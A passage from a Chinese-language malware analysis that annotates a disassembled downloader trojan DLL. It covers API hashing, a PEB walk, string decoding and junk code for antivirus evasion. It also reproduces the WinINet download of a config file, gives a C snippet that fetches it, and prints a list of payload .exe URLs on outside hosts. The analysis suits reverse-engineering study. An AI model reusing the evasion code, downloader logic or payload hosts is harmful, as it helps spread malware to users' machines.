10001A6D |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A70 |. 8982 EC000000 mov dword ptr [edx+EC], eax
10001A76 |. 68 D3774938 push 384977D3
10001A7B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A7E |. E8 9DF8FFFF call 10001320
10001A83 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A86 |. 8981 F0000000 mov dword ptr [ecx+F0], eax
10001A8C |. 68 E558D366 push 66D358E5
10001A91 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A94 |. E8 87F8FFFF call 10001320
10001A99 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A9C |. 8982 F4000000 mov dword ptr [edx+F4], eax
10001AA2 |. 68 A2341367 push 671334A2
10001AA7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AAA |. E8 71F8FFFF call 10001320
10001AAF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AB2 |. 8981 F8000000 mov dword ptr [ecx+F8], eax
10001AB8 |. 68 CDF81A09 push 91AF8CD
10001ABD |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AC0 |. E8 FBF7FFFF call <GetAPIAddressByHash_2>
10001AC5 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001AC8 |. 8982 FC000000 mov dword ptr [edx+FC], eax
10001ACE |. 68 15157A25 push 257A1515
10001AD3 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AD6 |. E8 E5F7FFFF call <GetAPIAddressByHash_2>
10001ADB |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001ADE |. 8981 00010000 mov dword ptr [ecx+100], eax
10001AE4 |. 68 A168A759 push 59A768A1
10001AE9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AEC |. E8 CFF7FFFF call <GetAPIAddressByHash_2>
10001AF1 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001AF4 |. 8982 08010000 mov dword ptr [edx+108], eax
10001AFA |. 68 7BBE2E07 push 72EBE7B
10001AFF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001B02 |. E8 B9F7FFFF call <GetAPIAddressByHash_2>
10001B07 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001B0A |. 8981 0C010000 mov dword ptr [ecx+10C], eax
10001B10 |. 68 40954A19 push 194A9540
10001B15 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001B18 |. E8 A3F7FFFF call <GetAPIAddressByHash_2>
10001B1D |. 8B55 9C mov edx, dword ptr [ebp-64]
10001B20 |. 8982 10010000 mov dword ptr [edx+110], eax
10001B26 |. 8B45 9C mov eax, dword ptr [ebp-64]
10001B29 |. 8BE5 mov esp, ebp
10001B2B |. 5D pop ebp
10001B2C \. C3 retn
再看GetAPIAddressByHash这个call. 这个call是根据函数名的Hash值得到其API地址并返回的 . 如下:
10001350 >/$ 55 push ebp
10001351 |. 8BEC mov ebp, esp
10001353 |. 83EC 0C sub esp, 0C
10001356 |. 894D F4 mov dword ptr [ebp-C], ecx
10001359 |. 8B4D F4 mov ecx, dword ptr [ebp-C]
1000135C |. E8 5FFDFFFF call <GetKernel32base>
10001361 |. 8945 F8 mov dword ptr [ebp-8], eax
10001364 |. 8B45 08 mov eax, dword ptr [ebp+8]
10001367 |. 50 push eax
10001368 |. 8B4D F8 mov ecx, dword ptr [ebp-8]
1000136B |. 51 push ecx
1000136C |. 8B4D F4 mov ecx, dword ptr [ebp-C]
1000136F |. E8 ACFEFFFF call <Get_API_BY_Hash>
10001374 |. 8945 FC mov dword ptr [ebp-4], eax
10001377 |. 8B45 FC mov eax, dword ptr [ebp-4]
1000137A |. 8BE5 mov esp, ebp
1000137C |. 5D pop ebp
1000137D \. C2 0400 retn 4
其中分两步得到指定Hash 的APi地址, 第一步是得到Kernel32.dll的基址. 然后利用Kernel32的基址和相应API的函数名的HASH值去得到其实际地址.
看一下其得到Kernel32基址的方法(使用了很多shellcode中使用的方法):
100010C0 >/$ 55 push ebp
100010C1 |. 8BEC mov ebp, esp
100010C3 |. 51 push ecx
100010C4 |. 53 push ebx
100010C5 |. 894D FC mov dword ptr [ebp-4], ecx
100010C8 |. 53 push ebx
100010C9 |. 51 push ecx
100010CA |. 64:8B1D 30000>mov ebx, dword ptr fs:[30] ; PEB地址。
100010D1 |. 8B4B 0C mov ecx, dword ptr [ebx+C] ; PEB->Ldr (_PEB_LDR_DATA结构)
100010D4 |. 8B49 1C mov ecx, dword ptr [ecx+1C] ; PEB->Ldr->InInitializeationOrderModulelist (_LIST_ENTRY结构)
100010D7 |. 8B09 mov ecx, dword ptr [ecx] ; 第一个节点为ntdll,这句之后,就为下一个节点kernel32.dll
100010D9 |. 8B41 08 mov eax, dword ptr [ecx+8] ; 加8处即为模块基址。
100010DC |. 59 pop ecx
100010DD |. 5B pop ebx
100010DE |. 5B pop ebx
100010DF |. 8BE5 mov esp, ebp
100010E1 |. 5D pop ebp
100010E2 \. C3 retn
得到了模块基址, 然后就是对其导出表中的函数进行遍历查询, 看是否哪个函数的函数名的Hash与传进来的HASH一致了.
如下:
<Get_API_BY_Hash> (模块基址已得到)
10001220 >/$ 55 push ebp
10001221 |. 8BEC mov ebp, esp
10001223 |. 83EC 1C sub esp, 1C
10001226 |. 894D E4 mov dword ptr [ebp-1C], ecx
10001229 |. 8B45 08 mov eax, dword ptr [ebp+8]
1000122C |. 8945 FC mov dword ptr [ebp-4], eax
1000122F |. 8B4D FC mov ecx, dword ptr [ebp-4]
10001232 |. 8B55 08 mov edx, dword ptr [ebp+8]
10001235 |. 0351 3C add edx, dword ptr [ecx+3C]
10001238 |. 8955 F4 mov dword ptr [ebp-C], edx
1000123B |. 8B45 F4 mov eax, dword ptr [ebp-C]
1000123E |. 8B4D 08 mov ecx, dword ptr [ebp+8]
10001241 |. 0348 78 add ecx, dword ptr [eax+78]
10001244 |. 894D F8 mov dword ptr [ebp-8], ecx
10001247 |. C745 F0 01000>mov dword ptr [ebp-10], 1
1000124E |. EB 09 jmp short 10001259
10001250 |> 8B55 F0 /mov edx, dword ptr [ebp-10]
10001253 |. 83C2 01 |add edx, 1
10001256 |. 8955 F0 |mov dword ptr [ebp-10], edx
10001259 |> 8B45 F8 mov eax, dword ptr [ebp-8]
1000125C |. 8B4D F0 |mov ecx, dword ptr [ebp-10]
1000125F |. 3B48 14 |cmp ecx, dword ptr [eax+14]
10001262 |. 73 53 |jnb short 100012B7
10001264 |. 8B55 F8 |mov edx, dword ptr [ebp-8]
10001267 |. 8B45 08 |mov eax, dword ptr [ebp+8]
1000126A |. 0342 20 |add eax, dword ptr [edx+20]
1000126D |. 8B4D F0 |mov ecx, dword ptr [ebp-10]
10001270 |. 8B55 08 |mov edx, dword ptr [ebp+8]
10001273 |. 031488 |add edx, dword ptr [eax+ecx*4]
10001276 |. 52 |push edx
10001277 |. 8B4D E4 |mov ecx, dword ptr [ebp-1C]
1000127A |. E8 71FEFFFF |call 100010F0
1000127F |. 8945 EC |mov dword ptr [ebp-14], eax
10001282 |. 8B45 EC |mov eax, dword ptr [ebp-14]
10001285 |. 3B45 0C |cmp eax, dword ptr [ebp+C]
10001288 |. 75 2B |jnz short 100012B5
1000128A |. 8B4D F8 |mov ecx, dword ptr [ebp-8]
1000128D |. 8B55 08 |mov edx, dword ptr [ebp+8]
10001290 |. 0351 24 |add edx, dword ptr [ecx+24]
10001293 |. 8B45 F0 |mov eax, dword ptr [ebp-10]
10001296 |. 66:8B0C42 |mov cx, word ptr [edx+eax*2]
1000129A |. 66:894D E8 |mov word ptr [ebp-18], cx
1000129E |. 8B55 F8 |mov edx, dword ptr [ebp-8]
100012A1 |. 8B45 08 |mov eax, dword ptr [ebp+8]
100012A4 |. 0342 1C |add eax, dword ptr [edx+1C]
100012A7 |. 0FB74D E8 |movzx ecx, word ptr [ebp-18]
100012AB |. 8B55 08 |mov edx, dword ptr [ebp+8]
100012AE |. 031488 |add edx, dword ptr [eax+ecx*4]
100012B1 |. 8BC2 |mov eax, edx
100012B3 |. EB 04 |jmp short 100012B9
100012B5 |>^ EB 99 \jmp short 10001250
100012B7 |> 33C0 xor eax, eax
100012B9 |> 8BE5 mov esp, ebp
100012BB |. 5D pop ebp
100012BC \. C2 0800 retn 8
其中, 在填充API地址的过程中, 还有两个函数, 如下:
... ...
100016CD |. 6A 47 push 47
100016CF |. 6A 0D push 0D
100016D1 |. 8D45 BC lea eax, dword ptr [ebp-44]
100016D4 |. 50 push eax
100016D5 |. 8D4D BC lea ecx, dword ptr [ebp-44]
100016D8 |. 51 push ecx
100016D9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016DC |. E8 6FF9FFFF call <DecodeString>
100016E1 |. 8D55 A0 lea edx, dword ptr [ebp-60]
100016E4 |. 52 push edx
100016E5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016E8 |. E8 03FBFFFF call <GetApiAddressByName>
... ...
其中有个字符串揭秘函数: <DecodeString> 如下:
解密字符串函数:
10001050 >/$ 55 push ebp
10001051 |. 8BEC mov ebp, esp
10001053 |. 83EC 08 sub esp, 8
10001056 |. 894D F8 mov dword ptr [ebp-8], ecx
10001059 |. C745 FC 00000>mov dword ptr [ebp-4], 0
10001060 |. EB 09 jmp short 1000106B
10001062 |> 8B45 FC /mov eax, dword ptr [ebp-4]
10001065 |. 83C0 01 |add eax, 1
10001068 |. 8945 FC |mov dword ptr [ebp-4], eax
1000106B |> 8B4D FC mov ecx, dword ptr [ebp-4]
1000106E |. 3B4D 10 |cmp ecx, dword ptr [ebp+10]
10001071 |. 7D 16 |jge short 10001089
10001073 |. 8B55 08 |mov edx, dword ptr [ebp+8]
10001076 |. 0355 FC |add edx, dword ptr [ebp-4]
10001079 |. 0FBE02 |movsx eax, byte ptr [edx]
1000107C |. 3345 14 |xor eax, dword ptr [ebp+14]
1000107F |. 8B4D 0C |mov ecx, dword ptr [ebp+C]
10001082 |. 034D FC |add ecx, dword ptr [ebp-4]
10001085 |. 8801 |mov byte ptr [ecx], al
10001087 |.^ EB D9 \jmp short 10001062
10001089 |> 8BE5 mov esp, ebp
1000108B |. 5D pop ebp
1000108C \. C2 1000 retn 10
上面的解密函数用于揭秘一些被加密的API函数名 . 继而调用<GetApiAddressByName>直接得到APi地址.
<GetApiAddressByName>:
100011F0 >/$ 55 push ebp
100011F1 |. 8BEC mov ebp, esp
100011F3 |. 83EC 08 sub esp, 8
100011F6 |. 894D F8 mov dword ptr [ebp-8], ecx
100011F9 |. 8B4D F8 mov ecx, dword ptr [ebp-8]
100011FC |. E8 BFFEFFFF call <GetKernel32base>
10001201 |. 8945 FC mov dword ptr [ebp-4], eax
10001204 |. 8B45 08 mov eax, dword ptr [ebp+8]
10001207 |. 50 push eax
10001208 |. 8B4D FC mov ecx, dword ptr [ebp-4]
1000120B |. 51 push ecx
1000120C |. 8B55 F8 mov edx, dword ptr [ebp-8]
1000120F |. 8B42 04 mov eax, dword ptr [edx+4]
10001212 |. FFD0 call eax ; kernel32.GetProcAddress
10001214 |. 8BE5 mov esp, ebp
10001216 |. 5D pop ebp
10001217 \. C2 0400 retn 4
API地址填充完毕, 看
1000102A |. E8 91210000 call 100031C0 这个call.
这个call启动两个线程:
100031C0 /$ 55 push ebp
100031C1 |. 8BEC mov ebp, esp
100031C3 |. 83EC 10 sub esp, 10
100031C6 |. 894D F0 mov dword ptr [ebp-10], ecx
100031C9 |. 50 push eax
100031CA |. B8 01000000 mov eax, 1
100031CF |. B8 04000000 mov eax, 4
100031D4 |. B8 0A000000 mov eax, 0A
100031D9 |. 58 pop eax
100031DA |. 50 push eax
100031DB |. B8 01000000 mov eax, 1
100031E0 |. B8 04000000 mov eax, 4
100031E5 |. B8 0A000000 mov eax, 0A
100031EA |. 58 pop eax
100031EB |. 50 push eax
100031EC |. B8 01000000 mov eax, 1
100031F1 |. B8 04000000 mov eax, 4
100031F6 |. B8 0A000000 mov eax, 0A
100031FB |. 58 pop eax
100031FC |. C645 F8 7E mov byte ptr [ebp-8], 7E
10003200 |. C645 F9 7E mov byte ptr [ebp-7], 7E
10003204 |. C645 FA 7E mov byte ptr [ebp-6], 7E
10003208 |. C645 FB 21 mov byte ptr [ebp-5], 21
1000320C |. C645 FC 7E mov byte ptr [ebp-4], 7E
10003210 |. C645 FD 7E mov byte ptr [ebp-3], 7E
10003214 |. C645 FE 7E mov byte ptr [ebp-2], 7E
10003218 |. C645 FF 00 mov byte ptr [ebp-1], 0
1000321C |. 8D45 F8 lea eax, dword ptr [ebp-8]
1000321F |. 50 push eax
10003220 |. 6A 00 push 0
10003222 |. 6A 00 push 0
10003224 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
10003227 |. 8B51 34 mov edx, dword ptr [ecx+34]
1000322A |. FFD2 call edx ; CreateMutex
1000322C |. 6A 00 push 0
1000322E |. 6A 00 push 0
10003230 |. 8B45 F0 mov eax, dword ptr [ebp-10]
10003233 |. 50 push eax
10003234 |. 68 80310010 push <ThreadFunc1> ; ThreadFunc1
10003239 |. 6A 00 push 0
1000323B |. 6A 00 push 0
1000323D |. 8B4D F0 mov ecx, dword ptr [ebp-10]
10003240 |. 8B51 38 mov edx, dword ptr [ecx+38]
10003243 |. FFD2 call edx ; CreateThread
10003245 |. 8945 F4 mov dword ptr [ebp-C], eax
10003248 |. 8B45 F4 mov eax, dword ptr [ebp-C]
1000324B |. 50 push eax
1000324C |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000324F |. 8B91 84000000 mov edx, dword ptr [ecx+84]
10003255 |. FFD2 call edx ; CloseHandle
10003257 |. 6A 00 push 0
10003259 |. 6A 00 push 0
1000325B |. 8B45 F0 mov eax, dword ptr [ebp-10]
1000325E |. 50 push eax
1000325F |. 68 60310010 push <ThreadFunc2>
10003264 |. 6A 00 push 0
10003266 |. 6A 00 push 0
10003268 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000326B |. 8B51 38 mov edx, dword ptr [ecx+38]
1000326E |. FFD2 call edx ; CreateThread
10003270 |. 8945 F4 mov dword ptr [ebp-C], eax
10003273 |. 6A FF push -1
10003275 |. 8B45 F4 mov eax, dword ptr [ebp-C]
10003278 |. 50 push eax
10003279 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000327C |. 8B51 3C mov edx, dword ptr [ecx+3C]
1000327F |. FFD2 call edx ; WaitForSingleObject
10003281 |. 33C0 xor eax, eax
10003283 |. 8BE5 mov esp, ebp
10003285 |. 5D pop ebp
10003286 \. C3 retn
该call头部也是一堆垃圾代码. 作为免杀的作用 .
然后创建一个"~~~!~~~"的互斥体. 继而直接开两个线程10003180和10003160.
其中3180线程句柄直接CloseHandle了, 10003160线程句柄则被WaitForSingleObject了. 这样是为了等所有动作执行完毕了才退出进程.
跟到ThreadFunc1:
10003180 >/. 55 push ebp
10003181 |. 8BEC mov ebp, esp
10003183 |. 51 push ecx
10003184 |. 8B45 08 mov eax, dword ptr [ebp+8]
10003187 |. 8945 FC mov dword ptr [ebp-4], eax
1000318A |. 8B4D FC mov ecx, dword ptr [ebp-4]
1000318D |. E8 4EFFFFFF call <_Thread_func1>
10003192 |. 8BE5 mov esp, ebp
10003194 |. 5D pop ebp
10003195 \. C2 0400 retn 4
<_Thread_func1>:
100030E0 >/$ 55 push ebp
100030E1 |. 8BEC mov ebp, esp
100030E3 |. 81EC 30010000 sub esp, 130
100030E9 |. 898D D0FEFFFF mov dword ptr [ebp-130], ecx
100030EF |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
100030F5 |. E8 86FDFFFF call <Fill_Rubbish_Code>
100030FA |> B8 01000000 /mov eax, 1
100030FF |. 85C0 |test eax, eax
10003101 |. 74 38 |je short 1000313B ; 这里根本跳不出来, 死循环一个。
10003103 |. 50 |push eax
10003104 |. B8 01000000 |mov eax, 1
10003109 |. B8 04000000 |mov eax, 4
1000310E |. B8 05000000 |mov eax, 5
10003113 |. B8 06000000 |mov eax, 6
10003118 |. B8 0A000000 |mov eax, 0A
1000311D |. 58 |pop eax
1000311E |. 8D8D D8FEFFFF |lea ecx, dword ptr [ebp-128]
10003124 |. E8 37FAFFFF |call 10002B60
10003129 |. 68 A0BB0D00 |push 0DBBA0
1000312E |. 8B8D D0FEFFFF |mov ecx, dword ptr [ebp-130]
10003134 |. 8B51 40 |mov edx, dword ptr [ecx+40]
10003137 |. FFD2 |call edx
10003139 |.^ EB BF \jmp short 100030FA
1000313B |> C785 D4FEFFFF>mov dword ptr [ebp-12C], 0
10003145 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000314B |. E8 F0F9FFFF call 10002B40
10003150 |. 8B85 D4FEFFFF mov eax, dword ptr [ebp-12C]
10003156 |. 8BE5 mov esp, ebp
10003158 |. 5D pop ebp
10003159 \. C3 retn
Fill_Rubbish_Code这个call就是填充N多垃圾代码的.
2B60这个call则开始着手下载工作了:
10002B60 /$ 55 push ebp
10002B61 |. 8BEC mov ebp, esp
10002B63 |. 81EC 40020000 sub esp, 240
10002B69 |. 898D C0FDFFFF mov dword ptr [ebp-240], ecx
10002B6F |. 50 push eax
10002B70 |. B8 01000000 mov eax, 1
10002B75 |. B8 08000000 mov eax, 8
10002B7A |. B8 09000000 mov eax, 9
10002B7F |. B8 0A000000 mov eax, 0A
10002B84 |. 58 pop eax
10002B85 |. 50 push eax
10002B86 |. B8 01000000 mov eax, 1
10002B8B |. B8 02000000 mov eax, 2
10002B90 |. B8 0A000000 mov eax, 0A
10002B95 |. 58 pop eax
10002B96 |. 68 04010000 push 104
10002B9B |. 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
10002BA1 |. 50 push eax
10002BA2 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002BA8 |. 8B51 30 mov edx, dword ptr [ecx+30]
10002BAB |. FFD2 call edx ; kernel32.GetSystemDirectoryA
10002BAD |. 68 8A7F0000 push 7F8A
10002BB2 |. 68 007F0000 push 7F00
10002BB7 |. 6A 00 push 0
10002BB9 |. 8B85 C0FDFFFF mov eax, dword ptr [ebp-240]
10002BBF |. 8B88 F4000000 mov ecx, dword ptr [eax+F4]
10002BC5 |. FFD1 call ecx
10002BC7 |. 50 push eax
10002BC8 |. 8B95 C0FDFFFF mov edx, dword ptr [ebp-240]
10002BCE |. 8B82 F8000000 mov eax, dword ptr [edx+F8]
10002BD4 |. FFD0 call eax
10002BD6 |. 50 push eax
10002BD7 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002BDD |. 8B91 F0000000 mov edx, dword ptr [ecx+F0]
10002BE3 |. FFD2 call edx
10002BE5 |. 50 push eax
10002BE6 |. B8 01000000 mov eax, 1
10002BEB |. B8 0A000000 mov eax, 0A
10002BF0 |. 58 pop eax
10002BF1 |. C745 F4 00000>mov dword ptr [ebp-C], 0
10002BF8 |. 8D45 F4 lea eax, dword ptr [ebp-C]
10002BFB |. 50 push eax
10002BFC |. 68 00500010 push 10005000 ; http://b2g.wo123.info/02/count.txt
10002C01 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002C07 |. E8 E4FCFFFF call 100028F0
10002C0C |. 8945 F8 mov dword ptr [ebp-8], eax
10002C0F |. 8B4D F8 mov ecx, dword ptr [ebp-8]
10002C12 |. 894D FC mov dword ptr [ebp-4], ecx
10002C15 |. 50 push eax
10002C16 |. B8 01000000 mov eax, 1
10002C1B |. B8 0A000000 mov eax, 0A
10002C20 |. 58 pop eax
10002C21 |. C785 E4FEFFFF>mov dword ptr [ebp-11C], 0
10002C2B |. EB 0F jmp short 10002C3C
10002C2D |> 8B95 E4FEFFFF /mov edx, dword ptr [ebp-11C]
10002C33 |. 83C2 01 |add edx, 1
10002C36 |. 8995 E4FEFFFF |mov dword ptr [ebp-11C], edx
10002C3C |> 8B85 E4FEFFFF mov eax, dword ptr [ebp-11C]
10002C42 |. 3B45 F4 |cmp eax, dword ptr [ebp-C]
10002C45 |. 0F83 F2010000 |jnb 10002E3D
10002C4B |. 8B4D F8 |mov ecx, dword ptr [ebp-8]
10002C4E |. 038D E4FEFFFF |add ecx, dword ptr [ebp-11C]
10002C54 |. 0FBE11 |movsx edx, byte ptr [ecx]
10002C57 |. 83FA 0D |cmp edx, 0D
10002C5A |. 0F85 D8010000 |jnz 10002E38
10002C60 |. 8B45 F8 |mov eax, dword ptr [ebp-8]
10002C63 |. 0385 E4FEFFFF |add eax, dword ptr [ebp-11C]
10002C69 |. 0FBE48 01 |movsx ecx, byte ptr [eax+1]
10002C6D |. 83F9 0A |cmp ecx, 0A
10002C70 |. 0F85 C2010000 |jnz 10002E38
10002C76 |. 8B55 F8 |mov edx, dword ptr [ebp-8]
10002C79 |. 0395 E4FEFFFF |add edx, dword ptr [ebp-11C]
10002C7F |. C602 00 |mov byte ptr [edx], 0
10002C82 |. C785 DCFEFFFF>|mov dword ptr [ebp-124], 0
10002C8C |. 8D85 DCFEFFFF |lea eax, dword ptr [ebp-124]
10002C92 |. 50 |push eax
10002C93 |. 8B4D FC |mov ecx, dword ptr [ebp-4]
10002C96 |. 83C1 02 |add ecx, 2
10002C99 |. 51 |push ecx
10002C9A |. 8B8D C0FDFFFF |mov ecx, dword ptr [ebp-240]
10002CA0 |. E8 4BFCFFFF |call 100028F0
... ... 省略N多代码... ...
看到了http://b2g.wo123.info/02/count.txt , 所以到期后的100028F0 call去看看.
100028F0 /$ 55 push ebp
100028F1 |. 8BEC mov ebp, esp
100028F3 |. 83EC 24 sub esp, 24
100028F6 |. 894D DC mov dword ptr [ebp-24], ecx
100028F9 |. C745 F8 00000>mov dword ptr [ebp-8], 0
10002900 |. 50 push eax ; rubbish code
10002901 |. B8 01000000 mov eax, 1
10002906 |. B8 02000000 mov eax, 2
1000290B |. B8 03000000 mov eax, 3
10002910 |. B8 04000000 mov eax, 4
10002915 |. B8 05000000 mov eax, 5
1000291A |. B8 06000000 mov eax, 6
1000291F |. B8 07000000 mov eax, 7
10002924 |. B8 08000000 mov eax, 8
10002929 |. B8 0A000000 mov eax, 0A
1000292E |. 58 pop eax
1000292F |. C645 FC 49 mov byte ptr [ebp-4], 49
10002933 |. C645 FD 4E mov byte ptr [ebp-3], 4E
10002937 |. C645 FE 54 mov byte ptr [ebp-2], 54
1000293B |. C645 FF 00 mov byte ptr [ebp-1], 0
1000293F |. 6A 00 push 0
10002941 |. 6A 00 push 0
10002943 |. 6A 00 push 0
10002945 |. 6A 00 push 0
10002947 |. 8D45 FC lea eax, dword ptr [ebp-4]
1000294A |. 50 push eax
1000294B |. 8B4D DC mov ecx, dword ptr [ebp-24]
1000294E |. 8B91 B4000000 mov edx, dword ptr [ecx+B4]
10002954 |. FFD2 call edx ; InternetOpenA
10002956 |. 8945 F0 mov dword ptr [ebp-10], eax
10002959 |. 6A 00 push 0
1000295B |. 68 000000C0 push C0000000
10002960 |. 6A 00 push 0
10002962 |. 6A 00 push 0
10002964 |. 8B45 08 mov eax, dword ptr [ebp+8]
10002967 |. 50 push eax
10002968 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000296B |. 51 push ecx
1000296C |. 8B55 DC mov edx, dword ptr [ebp-24]
1000296F |. 8B82 B8000000 mov eax, dword ptr [edx+B8]
10002975 |. FFD0 call eax ; InternetOpenUrl
10002977 |. 8945 F4 mov dword ptr [ebp-C], eax
1000297A |. 8B4D 0C mov ecx, dword ptr [ebp+C]
1000297D |. C701 00000000 mov dword ptr [ecx], 0
10002983 |. 50 push eax
10002984 |. B8 01000000 mov eax, 1
10002989 |. B8 02000000 mov eax, 2
1000298E |. B8 03000000 mov eax, 3
10002993 |. B8 04000000 mov eax, 4
10002998 |. B8 05000000 mov eax, 5
1000299D |. B8 0A000000 mov eax, 0A
100029A2 |. 58 pop eax
100029A3 |. C745 EC 01000>mov dword ptr [ebp-14], 1
100029AA |. EB 09 jmp short 100029B5
100029AC |> 8B55 EC /mov edx, dword ptr [ebp-14]
100029AF |. 83C2 01 |add edx, 1
100029B2 |. 8955 EC |mov dword ptr [ebp-14], edx
100029B5 |> 68 581F0000 push 1F58
100029BA |. 6A 00 |push 0
100029BC |. 8B45 DC |mov eax, dword ptr [ebp-24]
100029BF |. 8B48 24 |mov ecx, dword ptr [eax+24]
100029C2 |. FFD1 |call ecx
100029C4 |. 50 |push eax
100029C5 |. 8B55 DC |mov edx, dword ptr [ebp-24]
100029C8 |. 8B42 20 |mov eax, dword ptr [edx+20]
100029CB |. FFD0 |call eax
100029CD |. 8945 E4 |mov dword ptr [ebp-1C], eax
100029D0 |. C745 E8 00000>|mov dword ptr [ebp-18], 0
100029D7 |. 8D4D E8 |lea ecx, dword ptr [ebp-18]
100029DA |. 51 |push ecx
100029DB |. 68 581F0000 |push 1F58
100029E0 |. 8B55 E4 |mov edx, dword ptr [ebp-1C]
100029E3 |. 52 |push edx
100029E4 |. 8B45 F4 |mov eax, dword ptr [ebp-C]
100029E7 |. 50 |push eax
100029E8 |. 8B4D DC |mov ecx, dword ptr [ebp-24]
100029EB |. 8B91 BC000000 |mov edx, dword ptr [ecx+BC]
100029F1 |. FFD2 |call edx ; Wininet.InternetReadFile
100029F3 |. 837D E8 00 |cmp dword ptr [ebp-18], 0 ; if(dwRead == 0)
100029F7 |. 0F84 CA000000 |je 10002AC7 ; 读取字节数为0则调走。
... ...
到此, 知道该下载器是通过wininet库的Internet系列函数进行下载工作的. 而不是URLDownLoadToFile函数.
InternetOpenUrl这个函数在步过的时候会断到DLL入口处, 所以它里面创建了线程的(断CreateRemoteThread可以断下).
由于我的虚拟机不能上网,InternetOpenUrl会失败, 故我是直接在外机上的到了数据, patch到虚拟机中的OD的.
代码:
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <WinInet.h>
#pragma comment(lib,"Wininet.lib")
int _tmain(int argc, _TCHAR* argv[])
{
DWORD dwRead;
char buffer[10000];
memset(buffer,0,sizeof(buffer));
HINTERNET internetopen = NULL;
if (NULL == (internetopen = InternetOpenA(
"INT",
INTERNET_OPEN_TYPE_PRECONFIG/* 0 */,
NULL,
NULL,
0)))
{
printf("InternetOpen()");return 0;
}
HINTERNET internetopenurl = NULL;
if (NULL == (internetopenurl = InternetOpenUrlA(
internetopen,
"http://b2g.wo123.info/02/count.txt",
NULL,
0,
INTERNET_FLAG_PASSIVE | INTERNET_FLAG_NO_CACHE_WRITE,
0)))
{
printf("InternetOpenUrl()");return 0;
}
InternetReadFile(internetopenurl,buffer,sizeof(buffer),&dwRead);
printf("%s",buffer);
return 0;
}
一下是所得到的数据:
1:http://w2.7777ee.com/s21.exe
1:http://w1.7777ee.com/m37.exe
1:http://w1.7777ee.com/m39.exe
1:http://w1.7777ee.com/m01.exe
1:http://w2.7777ee.com/s01.exe
1:http://w2.7777ee.com/s15.exe
1:http://w1.7777ee.com/m5.exe
1:http://w2.7777ee.com/s10.exe
1:http://w2.7777ee.com/s2.exe
1:http://w1.7777ee.com/m4.exe
1:http://w1.7777ee.com/m24.exe
1:http://w1.7777ee.com/m33.exe
1:http://w2.7777ee.com/s14.exe
1:http://w3.7777ee.com/l3.exe
1:http://w3.7777ee.com/l8.exe
1:http://w3.7777ee.com/l1.exe
1:http://w2.7777ee.com/s12.exe
1:http://w3.7777ee.com/l9.exe
1:http://w2.7777ee.com/s16.exe
1:http://w1.7777ee.com/m38.exe
1:http://w2.7777ee.com/s02.exe
1:http://w1.7777ee.com/m15.exe
1:http://w3.7777ee.com/l6.exe
1:http://w1.7777ee.com/m23.exe
1:http://w3.7777ee.com/l4.exe
1:http://w3.7777ee.com/l5.exe
1:http://w2.7777ee.com/s17.exe
1:http://w2.7777ee.com/s11.exe
1:http://w1.7777ee.com/m25.exe
1:http://w3.7777ee.com/l7.exe
1:http://w9.7777ee.com/a1.exe
1:http://w2.7777ee.com/s8.exe
1:http://w2.7777ee.com/s1.exe
1:http://w3.7777ee.com/l2.exe
1:http://w2.7777ee.com/s20.exe
1:http://w2.7777ee.com/s13.exe
1:http://w9.7777ee.com/a9.exe
1:http://w9.7777ee.com/a8.exe
1:http://w9.7777ee.com/sb2.exe
1:http://w8.7777ee.com/b2.exe
1:http://w9.7777ee.com/a2.exe
1:http://w9.7777ee.com/a6.exe
1:http://w9.7777ee.com/a10.exe
1:http://w8.7777ee.com/m02.exe
1:http://w8.7777ee.com/02/cc.exe
1:http://w8.7777ee.com/02/ok.exe
接下来就是对得到的数据解析好.
10002A33 |. 52 |push edx
10002A34 |. 8B45 F8 |mov eax, dword ptr [ebp-8]
10002A37 |. 50 |push eax
10002A38 |. 8B4D E0 |mov ecx, dword ptr [ebp-20]
10002A3B |. 51 |push ecx
10002A3C |. 8B4D DC |mov ecx, dword ptr [ebp-24]
10002A3F |. E8 4CE6FFFF |call 10001090 ; 复制到另一片内存。
10002A44 |. 68 581F0000 |push 1F58
10002A49 |. 8B55 E4 |mov edx, dword ptr [ebp-1C]
10002A4C |. 52 |push edx
10002A4D |. 8B45 EC |mov eax, dword ptr [ebp-14]
10002A50 |. 83E8 01 |sub eax, 1
10002A53 |. 69C0 581F0000 |imul eax, eax, 1F58
10002A59 |. 0345 E0 |add eax, dword ptr [ebp-20]
10002A5C |. 50 |push eax
10002A5D |. 8B4D DC |mov ecx, dword ptr [ebp-24]
10002A60 |. E8 2BE6FFFF |call 10001090
10002A65 |. 8B4D F8 |mov ecx, dword ptr [ebp-8]
如下为call中的部分代码.
10002BFB |. 50 push eax
10002BFC |. 68 00500010 push 10005000 ; http://b2g.wo123.info/02/count.txt
10002C01 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002C07 |. E8 E4FCFFFF call 100028F0
其中有个call 100028f0. 这个call是带参数的. 即下载指定url的数据内容. dll木马第一次下载count.txt文件. 然后解析出每一个exe url,
